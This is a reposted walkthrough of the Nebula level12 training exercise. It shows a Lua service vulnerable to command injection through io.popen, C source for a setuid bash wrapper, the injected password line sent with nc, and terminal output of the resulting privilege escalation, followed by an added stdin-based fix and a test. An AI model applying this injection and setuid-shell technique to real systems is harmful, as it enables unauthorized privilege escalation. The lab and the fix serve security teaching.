ExploitExercises_Nebula_Level12
Source: Internet  Editor: 程序博客网  Time: 2024/06/05 16:31
The program source is a Lua script:

    local socket = require("socket")
    local server = assert(socket.bind("127.0.0.1", 50001))

    function hash(password)
      -- the client-supplied password is concatenated into a shell command line
      prog = io.popen("echo "..password.." | sha1sum", "r")
      data = prog:read("*all")
      prog:close()

      data = string.sub(data, 1, 40)

      return data
    end

    while 1 do
      local client = server:accept()
      client:send("Password: ")
      client:settimeout(60)
      local line, err = client:receive()
      if not err then
        print("trying " .. line) -- log from where ;\
        local h = hash(line)

        if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
          client:send("Better luck next time\n");
        else
          client:send("Congrats, your token is 413**CARRIER LOST**\n")
        end
      end

      client:close()
    end

The password can be injected:
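1. Create shell.c in the /tmp directory:

    #define _GNU_SOURCE   /* needed for the setresgid()/setresuid() prototypes */
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <stdio.h>

    int main(int argc, char **argv, char **envp)
    {
      gid_t gid;
      uid_t uid;

      /* take the effective IDs granted by the setuid/setgid bits */
      gid = getegid();
      uid = geteuid();

      /* make them the real and saved IDs as well, so bash keeps them */
      setresgid(gid, gid, gid);
      setresuid(uid, uid, uid);

      system("/bin/bash");
      return 0;
    }

2. Parameter injection: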
    level12@nebula:/tmp$ nc localhost 50001
    Password: 1; gcc -o /tmp/shell /tmp/shell.c; cp /tmp/shell /home/flag12; chmod +s /home/flag12/shell echo 1
3. Then simply run /home/flag12/shell:
    level12@nebula:/tmp$ cd /home/flag12
    level12@nebula:/home/flag12$ ls -l
    total 9
    -rw-r--r-- 1 root root 685 2011-11-20 21:22 flag12.lua
    -rwsr-sr-x 1 flag12 flag12 7321 2016-12-29 19:54 shell
    level12@nebula:/home/flag12$ date
    Thu Dec 29 19:55:36 PST 2016
    level12@nebula:/home/flag12$ ./shell
    flag12@nebula:/home/flag12$
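
The injection works because hash() builds a shell command line out of the client's input. The block below is an added example, not part of the original post or of flag12.lua: a replacement hash function (hypothetical name hash_via_stdin) that sends the password to sha1sum on stdin only, checked against constructed sample inputs. It assumes a POSIX system with sha1sum on the PATH and a writable temporary directory.

```lua
-- Added example (not from the original page): hash() from flag12.lua with the
-- client-supplied password kept out of the shell command line.

-- Hypothetical name. The command string is fixed apart from a scratch path
-- that Lua generates itself; the password reaches sha1sum on stdin only.
local function hash_via_stdin(password)
  local tmp = os.tmpname()
  local prog = assert(io.popen("sha1sum > " .. tmp, "w"))
  -- The original used `echo`, which appends a newline before hashing;
  -- write the same bytes so the stored digest still matches.
  prog:write(password, "\n")
  prog:close()                      -- waits for sha1sum to exit
  local f = assert(io.open(tmp, "r"))
  local data = f:read("*all")
  f:close()
  os.remove(tmp)
  return string.sub(data, 1, 40)
end

-- Constructed sample inputs: one plain, one carrying shell metacharacters.
local marker_path = "/tmp/l12_marker_should_not_exist"
local samples = { "letmein", "1; touch " .. marker_path .. "; echo 1" }

for _, line in ipairs(samples) do
  local h = hash_via_stdin(line)
  assert(#h == 40 and h:match("^%x+$"), "expected a 40-character hex digest")
  print(string.format("%-50s -> %s", line, h))
end

-- If the second sample had been interpreted by a shell, this file would exist.
local marker = io.open(marker_path, "r")
assert(marker == nil, "metacharacters were interpreted by a shell")
print("input was hashed as data; no command ran")
```

Computing the digest in-process with a SHA-1 library would remove the shell from the service altogether; which library is available depends on the deployment.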